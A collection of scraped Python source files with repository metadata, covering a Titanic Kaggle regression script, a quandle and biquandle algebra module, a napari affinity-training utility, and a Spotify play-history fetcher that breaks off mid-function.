"api_name": "numpy.arange",
"line_number": 179,
"usage_type": "call"
},
{
"api_name": "numpy.zeros",
"line_number": 185,
"usage_type": "call"
},
{
"api_name": "numpy.uint8",
"line_number": 185,
"usage_type": "attribute"
},
{
"api_name": "numpy.arange",
"line_number": 186,
"usage_type": "call"
},
{
"api_name": "numpy.array",
"line_number": 199,
"usage_type": "call"
},
{
"api_name": "numpy.float64",
"line_number": 199,
"usage_type": "attribute"
},
{
"api_name": "numpy.zeros",
"line_number": 205,
"usage_type": "call"
},
{
"api_name": "numpy.uint8",
"line_number": 205,
"usage_type": "attribute"
},
{
"api_name": "numpy.arange",
"line_number": 206,
"usage_type": "call"
},
{
"api_name": "numpy.arange",
"line_number": 209,
"usage_type": "call"
},
{
"api_name": "numpy.float64",
"line_number": 209,
"usage_type": "attribute"
},
{
"api_name": "numpy.arange",
"line_number": 230,
"usage_type": "call"
},
{
"api_name": "numpy.empty",
"line_number": 231,
"usage_type": "call"
},
{
"api_name": "numpy.uint8",
"line_number": 231,
"usage_type": "attribute"
},
{
"api_name": "numpy.arange",
"line_number": 232,
"usage_type": "call"
},
{
"api_name": "numpy.uint8",
"line_number": 232,
"usage_type": "attribute"
},
{
"api_name": "silx.math.colormap.apply_colormap",
"line_number": 234,
"usage_type": "call"
},
{
"api_name": "silx.math.colormap",
"line_number": 234,
"usage_type": "name"
},
{
"api_name": "numpy.array_equal",
"line_number": 242,
"usage_type": "call"
},
{
"api_name": "numpy.arange",
"line_number": 246,
"usage_type": "call"
},
{
"api_name": "numpy.nan",
"line_number": 247,
"usage_type": "attribute"
},
{
"api_name": "numpy.inf",
"line_number": 247,
"usage_type": "attribute"
},
{
"api_name": "numpy.nan",
"line_number": 248,
"usage_type": "attribute"
},
{
"api_name": "numpy.inf",
"line_number": 248,
"usage_type": "attribute"
},
{
"api_name": "silx.math.colormap.normalize",
"line_number": 257,
"usage_type": "call"
},
{
"api_name": "silx.math.colormap",
"line_number": 257,
"usage_type": "name"
},
{
"api_name": "numpy.asarray",
"line_number": 258,
"usage_type": "call"
},
{
"api_name": "numpy.array_equal",
"line_number": 267,
"usage_type": "call"
},
{
"api_name": "numpy.asarray",
"line_number": 269,
"usage_type": "call"
},
{
"api_name": "numpy.uint8",
"line_number": 269,
"usage_type": "attribute"
},
{
"api_name": "pytest.mark.parametrize",
"line_number": 251,
"usage_type": "call"
},
{
"api_name": "pytest.mark",
"line_number": 251,
"usage_type": "attribute"
}
] |
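For readers unfamiliar with the reference implementation tested above, LUT-based colormapping reduces to normalizing the data into index space and indexing the color table. The snippet below is a stripped-down NumPy illustration (linear normalization only, no NaN color), not silx's actual code.
# Stripped-down sketch of look-up-table colormapping (linear norm, no NaN handling).
import numpy as np

def apply_lut(data, colors, vmin, vmax):
    nb_colors = len(colors)
    scale = nb_colors / (vmax - vmin)
    indices = np.clip(scale * (data.astype("float64") - vmin), 0, nb_colors - 1)
    return colors[indices.astype("uint32")]

colors = np.zeros((256, 4), dtype=np.uint8)
colors[:, 0] = np.arange(256)
colors[:, 3] = 255
image = apply_lut(np.arange(-5, 15).reshape(4, 5), colors, 1, 10)
print(image.shape)   # (4, 5, 4): one RGBA value per input pixel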
71150367547
|
import numpy as np
import pandas as pd
import scipy
from sklearn.linear_model import LinearRegression as linreg
from sklearn.linear_model import LogisticRegression as logreg
from sklearn.cross_validation import KFold
from sklearn.cross_validation import *
from sklearn import cross_validation
titanic=pd.read_csv("train.csv")
#print(titanic.describe())
#print(titanic.head(5))
# ------------------- DATA CORRECTION --------------------------------
# 1) Fill missing Age data with median
titanic["Age"]=titanic["Age"].fillna(titanic["Age"].median())
# 2) Convert Sex string with 0 or 1
titanic.loc[titanic["Sex"] == "male", "Sex"] = 0 #convert 0 for men
titanic.loc[titanic["Sex"] =="female", "Sex"]=1 #convert 1 for women
# 3) Fill missing Embarked data with most common char
print(pd.value_counts(titanic["Embarked"].values, sort=False))
# "S" is most common char -> chosen as default for missing values
titanic["Embarked"]=titanic["Embarked"].fillna("S")
#4) Replace Embarked char with numeric code
#titanic.loc[titanic["Embarked"]=="S", "Embarked"]=0 # 'S' -> 0
#titanic.loc[titanic["Embarked"]=="C", "Embarked"]=1 # 'C' -> 1
titanic.loc[titanic["Embarked"]=="S", "Embarked"]=0
titanic.loc[titanic["Embarked"]=="C", "Embarked"]=1
titanic.loc[titanic["Embarked"]=="Q", "Embarked"]=2 # 'Q' -> 2
# input column used for predictions :
predictors=["Pclass", "Sex", "Age", "SibSp", "Parch", "Fare", "Embarked"]
# Initialize the algorithm
algo_linreg = linreg()
# Generate cross-validation folds with random splits
# returns row indices for the corresponding train and test sets
kf =KFold(titanic.shape[0], n_folds=3, random_state=1)
# Make the predictions
predictions =[]
for train, test in kf:
# Which predictors used on train fold
train_predictors = (titanic[predictors].iloc[train,:])
# Target/goal used to train the algo
train_target= titanic["Survived"].iloc[train]
# Train the algo with the predictors and target
# .fit(x input, y output)
algo_linreg.fit(train_predictors, train_target)
# Make predictions with the trained algo on test fold
test_predictions = algo_linreg.predict(titanic[predictors].iloc[test,:])
predictions.append(test_predictions)
# The predictions are in 3 Numpy arrays
# So we concatenate the arrays on axis 0 (because there is only one axis)
predictions=np.concatenate(predictions, axis=0)
predictions[predictions> .5]=1
predictions[predictions<= .5]=0
print(predictions)
print(sum(predictions==titanic["Survived"]))
accuracy= sum(predictions==titanic["Survived"])/len(predictions)
print(accuracy) # = 0.783
#------------------- Logistic Regression method ---------------------
# Initialize the algo
algo_logreg = logreg(random_state=1)
# Compute accuracy score for all cross-V folds;
# cross_val_score(algo, predictors, target, cross-validation fold)
scores = cross_validation.cross_val_score(algo_logreg, titanic[predictors], titanic["Survived"], cv=3)
# Mean of the scores for each folds (3 folds)
print(scores.mean())
#----------------------------------- Log Reg. with test set ---------------------
titanic_test = pd.read_csv("test.csv")
# I) Clean data
titanic_test["Age"] = titanic_test["Age"].fillna(titanic["Age"].median())
titanic_test["Fare"] = titanic_test["Fare"].fillna(titanic_test["Fare"].median())
titanic_test.loc[titanic_test["Sex"] == "male", "Sex"] = 0
titanic_test.loc[titanic_test["Sex"] == "female", "Sex"] = 1
titanic_test["Embarked"] = titanic_test["Embarked"].fillna("S")
titanic_test.loc[titanic_test["Embarked"] == "S", "Embarked"] = 0
titanic_test.loc[titanic_test["Embarked"] == "C", "Embarked"] = 1
titanic_test.loc[titanic_test["Embarked"] == "Q", "Embarked"] = 2
# II) Test algo on data
# Initialize the algo
algo_logreg_test=logreg(random_state=1)
# Train algo on using all training data
algo_logreg_test.fit(titanic[predictors], titanic["Survived"])
# Make predictions with algo on data
predictions=algo_logreg_test.predict(titanic_test[predictors])
# Generate new dataset for kaggle submission
submission= pd.DataFrame({
"PassengerId" : titanic_test["PassengerId"],
"Survived": predictions
})
submission.to_csv("kaggle.csv", index=False)
|
leminhtr/kaggle
|
Titanic/main_linreg-logreg.py
|
main_linreg-logreg.py
|
py
| 4,162 |
python
|
en
|
code
| 0 |
github-code
|
6
|
[
{
"api_name": "pandas.read_csv",
"line_number": 10,
"usage_type": "call"
},
{
"api_name": "pandas.value_counts",
"line_number": 25,
"usage_type": "call"
},
{
"api_name": "sklearn.linear_model.LinearRegression",
"line_number": 41,
"usage_type": "call"
},
{
"api_name": "sklearn.cross_validation.KFold",
"line_number": 45,
"usage_type": "call"
},
{
"api_name": "numpy.concatenate",
"line_number": 64,
"usage_type": "call"
},
{
"api_name": "sklearn.linear_model.LogisticRegression",
"line_number": 79,
"usage_type": "call"
},
{
"api_name": "sklearn.cross_validation.cross_val_score",
"line_number": 83,
"usage_type": "call"
},
{
"api_name": "sklearn.cross_validation",
"line_number": 83,
"usage_type": "name"
},
{
"api_name": "pandas.read_csv",
"line_number": 90,
"usage_type": "call"
},
{
"api_name": "sklearn.linear_model.LogisticRegression",
"line_number": 106,
"usage_type": "call"
},
{
"api_name": "pandas.DataFrame",
"line_number": 115,
"usage_type": "call"
}
] |
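The record above imports `sklearn.cross_validation`, which was deprecated in scikit-learn 0.18 and removed in 0.20. A rough modern equivalent of its manual KFold loop, using `sklearn.model_selection` and synthetic data in place of the Titanic CSVs, is sketched below.
# Sketch of the same manual KFold loop with the current scikit-learn API;
# the data here are synthetic, not the Titanic training set.
import numpy as np
from sklearn.linear_model import LinearRegression
from sklearn.model_selection import KFold

rng = np.random.default_rng(1)
X = rng.random((30, 4))
y = (X.sum(axis=1) > 2.0).astype(int)

kf = KFold(n_splits=3)          # contiguous folds, so prediction order matches y
predictions = []
for train_idx, test_idx in kf.split(X):
    model = LinearRegression().fit(X[train_idx], y[train_idx])
    predictions.append(model.predict(X[test_idx]))
predictions = np.concatenate(predictions)
accuracy = ((predictions > 0.5).astype(int) == y).mean()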
20086331044
|
"""
Contains classes Quandle, Biquandle, Singquandle,
Alexander_Quandle, Conj_Quandle, and Trivial_Quandle.
FIXME:
- Nothing for now.
TODO:
- If X is a rack with operation a*b, then it is a birack if we
define a**b as the identity a**b == a. Thus biquandle matrix2
should be optional.
- Does the above apply to singquandles/singracks?
- homomorphism methods.
"""
import numpy as np
from pyknots.modules.magmas import Magma
from pyknots.modules.groups import Group
from pyknots.modules.utils import issquare, applymorphism
import json
import os
__all__ = ['Quandle', 'Biquandle', 'Singquandle',
'Alexander_Quandle', 'Conj_Quandle', 'Trivial_Quandle']
class Quandle(Magma):
"""Instantiate a quandle object by passing Quandle() a matrix, a
string representation of the RIG index, or a numpy array.
"""
def __init__(self, matrix):
if type(matrix) is str:
dirname = os.path.dirname(os.path.realpath(__file__))
path = os.path.join(os.path.dirname(dirname), 'data', 'RIG_quandles.json')
try:
with open(path, 'r') as fp:
matrix = json.load(fp)[matrix]
self.__init__(matrix)
except KeyError:
raise TypeError('Input %s not a RIG quandle.' % (matrix))
else:
super().__init__(matrix)
def __str__(self):
return str(self.array)
def as_biquandle(self):
""" Generate identity matrix and return biquandle class object."""
M1 = self.array
M2 = Trivial_Quandle(self.order, self.index).array
B = Biquandle(M1, M2)
return B
def inverse_quandle(self):
M = self.array
n = self.order
new_M = np.zeros((n, n), dtype=int)
for i in range(n):
for j in range(n):
k = M[i,j]
new_M[k,j] = i
return Quandle(new_M)
def is_rack(self):
""" A rack is a set with 2 axioms: for a, b, c in X,
1) a*b is a bijection.
2) (a*b)*c == (a*c)*(b*c).
"""
M = self.array
ind = self.index
for i in range(self.order):
col = []
for j in range(self.order):
for k in range(self.order):
if M[M[i,j]-ind,k] != M[M[i,k]-ind,M[j,k]-ind]:
return False
col.append(M[j,i])
for c in range(len(col)):
if not c+ind in col:
return False
return True
def is_quandle(self):
""" A quandle is a rack that satisfies the third axiom that for
all a in X, a*a == a.
"""
M = self.array
ind = self.index
if not self.is_rack():
return False
for i in range(self.order):
if M[i,i] != i+ind:
return False
return True
def is_biquandle(self):
return False
def is_singquandle(self):
return False
def is_kei(self):
if self.is_quandle() and self.is_involutory():
return True
return False
def is_trivial(self):
""" A quandle is trivial if for all a, b in X, a*b == a."""
M = self.array
for i in range(self.order):
for j in range(self.order):
if M[i,j] != i:
return False
return True
def is_involutory(self):
""" A quandle is involutory if for all a, b in X, a*(a*b) == b."""
M = self.array
for i in range(self.order):
for j in range(self.order):
if M[i,M[i,j]] != j:
return False
return True
def is_dihedral(self):
""" If for all a, b in X, a*b == 2*b-a then it is dihedral.
Equivalent to isomorphism to Alexander_Quandle(p, -1)
"""
M = self.array
ind = self.index
p = self.order
for i in range(self.order):
for j in range(self.order):
if M[i,j] != ((2*(j) - (i)) % p)+ind:
return False
return True
def is_medial(self):
""" Equivalent to abelian quandle. If X satisfies the property that for
any a, b, c, d in Q, (a*b)*(c*d) == (a*c)*(b*d) it is medial.
"""
M = self.array
ind = self.index
for i in range(self.order):
for j in range(self.order):
for m in range(self.order):
for n in range(self.order):
if M[M[i,j]-ind,M[m,n]-ind] != M[M[i,m]-ind,M[j,n]-ind]:
return False
return True
class Biquandle(object):
""" Instantiate a biquandle object by passing Biquandle() a pair of
matrices, a string representation of the RIG index, or a
numpy array.
"""
def __init__(self, matrix1, matrix2=None):
if matrix2 is None:
M1 = Quandle(matrix1)
M2 = Trivial_Quandle(M1.order, M1.index)
self.__init__(M1.array, M2.array)
else:
self.quandle1, self.quandle2 = Quandle(matrix1), Quandle(matrix2)
self.array1, self.array2 = np.array(matrix1), np.array(matrix2)
self.order = len(matrix1[0])
self.index = self._index()
def __str__(self):
return str(self.array1)+str(self.array2)
def _index(self):
""" Verify that indices of input match."""
ind1, ind2 = np.amin(self.array1), np.amin(self.array2)
if ind1 != ind2:
raise IndexError('%s, %s have non-matching indices.' % (self.array1, self.array2))
return ind1
def is_birack(self):
""" A birack is a set with 4 axioms: for a, b, c in X,
1) a*b, a**b is a bijection.
2) (a**b)**(c**b) == (a**c)**(b*c).
3) (a*b)*(c*b) == (a*c)*(b**c)
4) (a*b)**(c*b) == (a**c)*(b**c)
"""
M1, M2 = self.array1, self.array2
ind = self.index
if not self.is_invertible():
return False
for a in range(self.order):
for b in range(self.order):
for c in range(self.order):
if M2[M2[a,b]-ind,M2[c,b]-ind] != M2[M2[a,c]-ind,M1[b,c]-ind]:
return False
if M1[M1[a,b]-ind,M1[c,b]-ind] != M1[M1[a,c]-ind,M2[b,c]-ind]:
return False
if M2[M1[a,b]-ind,M1[c,b]-ind] != M1[M2[a,c]-ind,M2[b,c]-ind]:
return False
return True
def is_biquandle(self):
""" A biquandle is a birack such that for all a in X, there
exists x such that: x*a == x <==> a**x == a"""
M1, M2 = self.array1, self.array2
if not self.is_birack():
return False
for i in range(self.order):
for j in range(self.order):
if M1[i,j] == i and M2[j,i] != j:
return False
return True
def is_singquandle(self):
return False
def is_invertible(self):
if self.quandle1.is_left_invertible():
if self.quandle2.is_left_invertible():
return True
return False
def check_wada(self):
M1, M2 = self.array1, self.array2
for a in range(self.order):
for b in range(self.order):
for c in range(self.order):
if M1[M1[a,b],M1[M2[a,b],c]] != M1[a,M1[b,c]]:
return False
if M2[M1[a,b],M1[M2[a,b],c]] != M1[M2[a,M1[b,c]],M2[b,c]]:
return False
if M2[M2[a,b],c] != M2[M2[a,M1[b,c]],M2[b,c]]:
return False
return True
class Singquandle(object):
""" Instantiate a singquandle object by passing Singquandle() three
matrices (denoting Cayley tables for *, R1, and R2), a string
representation of the RIG index, or a numpy array.
(Only matrices supported)
"""
def __init__(self, matrix1, matrix2, matrix3):
self.quandle1, self.quandle2 = Quandle(matrix1), Quandle(matrix2)
self.quandle3 = Quandle(matrix3)
self.array1, self.array2 = np.array(matrix1), np.array(matrix2)
self.array3 = np.array(matrix3)
self.order = len(matrix1[0])
self.index = self._index()
def __str__(self):
return str(self.array1)+str(self.array2)+str(self.array3)
def _index(self):
""" Verify that indices of input match."""
ind1, ind2, ind3 = np.amin(self.array1), np.amin(self.array2), np.amin(self.array3)
if ind1 != ind2 != ind3:
raise IndexError('%s, %s, %s have non-matching indices.' % (self.array1, self.array2, self.array3))
return ind1
def is_invertible(self):
""" Check whether * is an invertible operation."""
if not self.quandle1.is_left_invertible():
return False
return True
"""
def check_identity(self):
R1(x,y) = R2(y,x)*x, R2(x,y) = R1(y,x)*y.
M1, M2, M3 = self.array1, self.array2, self.array3
ind = self.index
for a in range(self.order):
for b in range(self.order):
if M2[a,b] != M1[M3[b,a]-ind,a]:
return False
if M3[a,b] != M1[M2[b,a]-ind,b]:
return False
return True
"""
def is_singquandle(self):
""" Check if the object is a singquandle."""
if self.is_nonoriented_singquandle() or self.is_oriented_singquandle():
return True
return False
def is_nonoriented_singquandle(self):
""" Check if the singquandle satisfies the axioms of a nonoriented
singquandle.
"""
M1, M2, M3 = self.array1, self.array2, self.array3
ind = self.index
if not self.is_invertible():
return False
for a in range(self.order):
for b in range(self.order):
if M3[a,b] != M2[b,M1[a,b]-ind]:
return False
if M3[b,M1[a,b]-ind] != M1[M2[a,b]-ind,M3[a,b]-ind]:
return False
if M2[a,b] != M3[M1[b,a]-ind,a]:
return False
if M2[M1[b,a]-ind,a] != M1[M3[a,b]-ind,M2[a,b]-ind]:
return False
for c in range(self.order):
if M1[M1[b,c]-ind,M3[a,c]-ind] != M1[M1[b,a]-ind,M2[a,c]-ind]:
return False
if M1[M2[a,b]-ind,c] != M2[M1[a,c]-ind,M1[b,c]-ind]:
return False
if M1[M3[a,b]-ind,c] != M3[M1[a,c]-ind,M1[b,c]-ind]:
return False
return True
def is_oriented_singquandle(self):
""" Check if the singquandle satisfies the axioms of an oriented
singquandle.
"""
M1, M2, M3 = self.array1, self.array2, self.array3
n, ind = self.order, self.index
inv = self.quandle1.inverse_quandle().array
if not self.is_invertible():
return False
for x in range(n):
for y in range(n):
for z in range(n):
if M1[M2[inv[x,y],z],y] != M2[x,M1[z,y]]:
return False
if M3[inv[x,y],z] != inv[M3[x,M1[z,y]], y]:
return False
if M1[inv[y,M2[x,z]],x] != inv[M1[y,M3[x,z]], z]:
return False
if M3[x,y] != M2[y,M1[x,y]]:
return False
if M1[M2[x,y], M3[x,y]] != M3[y, M1[x,y]]:
return False
return True
class Alexander_Quandle(Quandle):
""" Returns quandle generated by Alexander module Z_p/((t**b)-a).
Setting exponent b not supported.
"""
def __init__(self, p, a=-1, b=None):
M = np.zeros((p, p), dtype=int)
for i in range(p):
for j in range(p):
M[i,j] = (a*i + (1 - a)*j) % p
super().__init__(M.tolist())
class Conj_Quandle(Quandle):
""" Returns quandle generated by the group cayley table with automorphism f. Pass
f as a permutation in the form (1, 2, 3, ...). Then f maps index(i) to i.
Quandle is given by conjugation operation x*y = f(y)^{-1}f(x)f(y).
"""
def __init__(self, matrix, *args):
n = len(matrix[0])
M = np.zeros((n, n), dtype=int)
for arg in args:
if isinstance(arg, tuple):
matrix = applymorphism(matrix, arg)
G = Group(matrix)
m = G.array
for i in range(n):
for j in range(n):
M[i,j] = m[m[G.inverse(j), i], j]
super().__init__(M)
class Trivial_Quandle(Quandle):
""" Returns a trivial quandle such that for all a, b in X,
a*b == a. Optional index for non-0-indexed quandles.
"""
def __init__(self, dim, index=0, flip=False):
ind = index
M = []
if not flip:
for i in range(dim):
row = [i+ind for j in range(ind, dim+ind)]
M.append(row)
else:
for i in range(dim):
row = [j+ind for j in range(ind, dim+ind)]
M.append(row)
super().__init__(M)
|
RafaelMri/Pyknots
|
modules/quandles.py
|
quandles.py
|
py
| 13,410 |
python
|
en
|
code
| 1 |
github-code
|
6
|
[
{
"api_name": "pyknots.modules.magmas.Magma",
"line_number": 26,
"usage_type": "name"
},
{
"api_name": "os.path.dirname",
"line_number": 32,
"usage_type": "call"
},
{
"api_name": "os.path",
"line_number": 32,
"usage_type": "attribute"
},
{
"api_name": "os.path.realpath",
"line_number": 32,
"usage_type": "call"
},
{
"api_name": "os.path.join",
"line_number": 33,
"usage_type": "call"
},
{
"api_name": "os.path",
"line_number": 33,
"usage_type": "attribute"
},
{
"api_name": "os.path.dirname",
"line_number": 33,
"usage_type": "call"
},
{
"api_name": "json.load",
"line_number": 36,
"usage_type": "call"
},
{
"api_name": "numpy.zeros",
"line_number": 56,
"usage_type": "call"
},
{
"api_name": "numpy.array",
"line_number": 164,
"usage_type": "call"
},
{
"api_name": "numpy.amin",
"line_number": 173,
"usage_type": "call"
},
{
"api_name": "numpy.array",
"line_number": 244,
"usage_type": "call"
},
{
"api_name": "numpy.array",
"line_number": 245,
"usage_type": "call"
},
{
"api_name": "numpy.amin",
"line_number": 254,
"usage_type": "call"
},
{
"api_name": "numpy.zeros",
"line_number": 341,
"usage_type": "call"
},
{
"api_name": "numpy.zeros",
"line_number": 354,
"usage_type": "call"
},
{
"api_name": "pyknots.modules.utils.applymorphism",
"line_number": 357,
"usage_type": "call"
},
{
"api_name": "pyknots.modules.groups.Group",
"line_number": 358,
"usage_type": "call"
}
] |
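As a quick sanity check of the axioms spelled out in the docstrings above, the dihedral quandle on Z_5 (a*b = 2b - a mod 5) can be verified directly with a few nested loops. This standalone sketch uses the same 0-indexed Cayley-table convention as the module but none of its classes.
# Standalone check of the quandle axioms on the dihedral quandle over Z_5.
import numpy as np

n = 5
M = np.array([[(2 * b - a) % n for b in range(n)] for a in range(n)])  # M[a, b] = a*b

idempotent = all(M[a, a] == a for a in range(n))
right_translations_bijective = all(len(set(M[:, b])) == n for b in range(n))
self_distributive = all(
    M[M[a, b], c] == M[M[a, c], M[b, c]]
    for a in range(n) for b in range(n) for c in range(n)
)
assert idempotent and right_translations_bijective and self_distributive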
648181227
|
import numpy as np
import torch
from affogato.affinities import compute_affinities
from torchvision.utils import make_grid
from inferno.extensions.criteria import SorensenDiceLoss
class ConcatDataset(torch.utils.data.Dataset):
def __init__(self, *datasets):
self.datasets = datasets
self.lens = [len(ds) for ds in self.datasets]
self.start_idx = np.cumsum(self.lens)
self.start_idx[-1] = 0
self.start_idx = np.roll(self.start_idx, 1)
def __len__(self):
return sum(self.lens)
def __getitem__(self, index):
ds_index = np.where(index - self.start_idx >= 0)[0][-1]
item_index = index - self.start_idx[ds_index]
return self.datasets[ds_index][item_index]
class DefaultDataset(torch.utils.data.Dataset):
""" Simple default dataset for generating affinities
from segmentation and mask.
"""
patch_shape = [512, 512] # TODO expose this and other parameters
def to_affinities(self, seg, mask):
seg[~mask] = 0
affs, aff_mask = compute_affinities(seg, self.offsets, have_ignore_label=True)
aff_mask = aff_mask.astype('bool')
affs = 1. - affs
mask_transition, aff_mask2 = compute_affinities(mask, self.offsets)
mask_transition[~aff_mask2.astype('bool')] = 1
aff_mask[~mask_transition.astype('bool')] = True
return affs, aff_mask
@staticmethod
def estimate_n_samples(shape, patch_shape):
# we estimate the number of samples by tiling shape with patch_shape
crops_per_dim = [sh / float(cs) for sh, cs in zip(shape, patch_shape)]
return int(np.prod(crops_per_dim))
def __init__(self, raw, seg, mask_ids, offsets, transforms=None):
self.raw = raw
self.seg = seg
self.mask_ids = mask_ids
self.offsets = offsets
self.transforms = transforms
self.n_samples = self.estimate_n_samples(self.raw.shape, self.patch_shape)
def __getitem__(self, index):
# TODO sample so that we are biased towards the mask
def sample_raw_seg_mask():
offset = [np.random.randint(0, sh - csh) if sh > csh else 0
for sh, csh in zip(self.raw.shape, self.patch_shape)]
bb = tuple(slice(off, off + csh) for off, csh in zip(offset, self.patch_shape))
raw = self.raw[bb]
seg = self.seg[bb]
if self.transforms is not None:
raw, seg = self.transforms(raw, seg)
raw, seg = raw.copy(), seg.copy()
mask = np.isin(seg, self.mask_ids)
return raw, seg, mask
raw, seg, mask = sample_raw_seg_mask()
# TODO ensure that we have some in-mask area
# # some arbitrary but very small pixel threshold
# while mask.sum() < 25:
# raw, seg, mask = sample_raw_seg_mask()
# add channel dim
raw = raw[None]
# make affs and aff_mask
affs, aff_mask = self.to_affinities(seg, mask)
return raw, affs, aff_mask
def __len__(self):
return self.n_samples
class MaskedLoss(torch.nn.Module):
def __init__(self):
super().__init__()
self.criterion = SorensenDiceLoss()
def forward(self, pred, y, mask):
mask.requires_grad = False
masked_prediction = pred * mask
loss = self.criterion(masked_prediction, y)
return loss
def default_training(proc_id, net, ds,
pipe, device, step):
loader = torch.utils.data.DataLoader(ds, batch_size=1, num_workers=2)
p_out, p_in = pipe
optimizer = torch.optim.Adam(net.parameters(), lr=1e-4)
loss = MaskedLoss()
loss = loss.to(device)
logger = torch.utils.tensorboard.SummaryWriter('./runs/imws')
add_gradients = True
log_frequency = 10
net.train()
while True:
if p_out.poll():
if not p_out.recv():
p_in.send(step)
break
for x, y, mask in loader:
x = x.to(device)
y, mask = y.to(device), mask.to(device)
optimizer.zero_grad()
pred = net(x)
pred.retain_grad()
loss_val = loss(pred, y, mask)
loss_val.backward()
optimizer.step()
logger.add_scalar("loss", loss_val.item(), step)
step += 1
if step % log_frequency == 0:
print("Background training process iteration", step)
x = x[0].detach().cpu()
logger.add_image('input', x, step)
y = y[0].detach().cpu()
if add_gradients:
grads = pred.grad[0].detach().cpu()
grads -= grads.min()
grads /= grads.max()
pred = torch.clamp(pred[0].detach().cpu(), 0.001, 0.999)
tandp = [target.unsqueeze(0) for target in y]
nrow = len(tandp)
tandp.extend([p.unsqueeze(0) for p in pred])
if add_gradients:
tandp.extend([grad.unsqueeze(0) for grad in grads])
tandp = make_grid(tandp, nrow=nrow)
logger.add_image('target_and_prediction', tandp, step)
# for debugging
# return x, y, pred, grads
|
constantinpape/affogato
|
src/python/module/affogato/interactive/napari/train_utils.py
|
train_utils.py
|
py
| 5,323 |
python
|
en
|
code
| 9 |
github-code
|
6
|
[
{
"api_name": "torch.utils",
"line_number": 9,
"usage_type": "attribute"
},
{
"api_name": "numpy.cumsum",
"line_number": 14,
"usage_type": "call"
},
{
"api_name": "numpy.roll",
"line_number": 16,
"usage_type": "call"
},
{
"api_name": "numpy.where",
"line_number": 22,
"usage_type": "call"
},
{
"api_name": "torch.utils",
"line_number": 27,
"usage_type": "attribute"
},
{
"api_name": "affogato.affinities.compute_affinities",
"line_number": 35,
"usage_type": "call"
},
{
"api_name": "affogato.affinities.compute_affinities",
"line_number": 39,
"usage_type": "call"
},
{
"api_name": "numpy.prod",
"line_number": 48,
"usage_type": "call"
},
{
"api_name": "numpy.random.randint",
"line_number": 62,
"usage_type": "call"
},
{
"api_name": "numpy.random",
"line_number": 62,
"usage_type": "attribute"
},
{
"api_name": "numpy.isin",
"line_number": 73,
"usage_type": "call"
},
{
"api_name": "torch.nn",
"line_number": 96,
"usage_type": "attribute"
},
{
"api_name": "inferno.extensions.criteria.SorensenDiceLoss",
"line_number": 99,
"usage_type": "call"
},
{
"api_name": "torch.utils.data.DataLoader",
"line_number": 110,
"usage_type": "call"
},
{
"api_name": "torch.utils",
"line_number": 110,
"usage_type": "attribute"
},
{
"api_name": "torch.optim.Adam",
"line_number": 114,
"usage_type": "call"
},
{
"api_name": "torch.optim",
"line_number": 114,
"usage_type": "attribute"
},
{
"api_name": "torch.utils.tensorboard.SummaryWriter",
"line_number": 118,
"usage_type": "call"
},
{
"api_name": "torch.utils",
"line_number": 118,
"usage_type": "attribute"
},
{
"api_name": "torch.clamp",
"line_number": 157,
"usage_type": "call"
},
{
"api_name": "torchvision.utils.make_grid",
"line_number": 164,
"usage_type": "call"
}
] |
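The MaskedLoss above multiplies the prediction by a mask before handing it to inferno's SorensenDiceLoss. A plain-PyTorch sketch of the same pattern, with MSE standing in for the Dice loss so the snippet has no extra dependencies, could look like this; the tensor shapes are made up for illustration.
# Plain-PyTorch sketch of the masked-loss pattern; MSE replaces SorensenDiceLoss
# here only to keep the example dependency-free.
import torch

class MaskedMSELoss(torch.nn.Module):
    def __init__(self):
        super().__init__()
        self.criterion = torch.nn.MSELoss()

    def forward(self, pred, target, mask):
        mask = mask.detach()               # no gradients flow through the mask
        return self.criterion(pred * mask, target * mask)

pred = torch.rand(1, 2, 8, 8, requires_grad=True)
target = torch.rand(1, 2, 8, 8)
mask = (torch.rand(1, 2, 8, 8) > 0.5).float()
loss = MaskedMSELoss()(pred, target, mask)
loss.backward()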
26298956035
|
import argparse
from dateutil import tz
from datetime import datetime
from spotipy import Spotify
import spotipy.util
from models import Play, Track, Album, Artist, PostgreSQLConnection
import settings
def set_timezone_to_datetime(datetime_to_set, timezone):
return datetime_to_set.replace(tzinfo=tz.gettz(timezone))
def convert_played_at_from_response_to_datetime(played_at):
try:
return datetime.strptime(played_at, '%Y-%m-%dT%H:%M:%S.%fZ')
except ValueError:
# For the rare case where the played-at time falls exactly on a full second
return datetime.strptime(played_at, '%Y-%m-%dT%H:%M:%SZ')
def convert_datetime_from_timezone_to_timezone(datetime_to_convert, from_tz_code, to_tz_code):
from_tz = tz.gettz(from_tz_code)
to_tz = tz.gettz(to_tz_code)
datetime_to_convert = datetime_to_convert.replace(tzinfo=from_tz)
converted_datetime = datetime_to_convert.astimezone(to_tz)
return converted_datetime
class SpotifyConnection(object):
def __init__(self, user_data):
self.user_name = user_data['user_name']
token = spotipy.util.prompt_for_user_token(self.user_name,
scope='user-read-recently-played',
client_id=user_data['client_id'],
client_secret=user_data['client_secret'],
redirect_uri=user_data['redirect_uri'])
self.client = Spotify(auth=token)
self.db = self.init_db()
def init_db(self):
return PostgreSQLConnection()
def get_artist(self, artist_id):
artist = self.db.session.query(Artist).get(artist_id)
if artist:
return artist
else:
artist_response = self.client.artist(artist_id)
artist = Artist()
artist.artist_id = artist_id
artist.artist_data = artist_response
self.db.save_instance(artist)
print("> Artist {} was not in database.".format(artist.artist_data['name']))
return self.db.session.query(Artist).get(artist_id)
def get_album(self, album_id):
album = self.db.session.query(Album).get(album_id)
if album:
return album
else:
album_response = self.client.album(album_id)
album = Album()
album.album_data = album_response
album.album_id = album_response['id']
# Artists
for album_artist_response in album_response['artists']:
album.artists.append(self.get_artist(album_artist_response['id']))
self.db.save_instance(album)
print("> Album {} was not in database.".format(album.album_data['name']))
return self.db.session.query(Album).get(album_id)
def get_track(self, track_id):
track = self.db.session.query(Track).get(track_id)
if track:
return track
else:
response = self.client.track(track_id)
track = Track()
track.track_id = track_id
track.track_data = response
# Album
track.album = self.get_album(response['album']['id'])
# Artists
for artist_response in response['artists']:
track.artists.append(self.get_artist(artist_response['id']))
# Audio feature
audio_feature_response = self.client.audio_features(track_id)[0]
if audio_feature_response: # Some tracks do not have audio features
track.audio_feature_data = audio_feature_response
print("> Track {} was not in database.".format(track.track_data['name']))
self.db.save_instance(track)
return self.db.session.query(Track).get(track_id)
def get_play_from_played_at_utc_and_track_id(self, played_at_utc, track_id):
played_at_utc = convert_played_at_from_response_to_datetime(played_at_utc)
played_at_utc = set_timezone_to_datetime(played_at_utc, timezone='UTC')
played_at_cet = convert_datetime_from_timezone_to_timezone(played_at_utc,
from_tz_code='UTC',
to_tz_code='CET')
# Play
play = Play()
play.user_name = self.user_name
play.played_at_utc_timestamp = played_at_utc.timestamp() * 1000
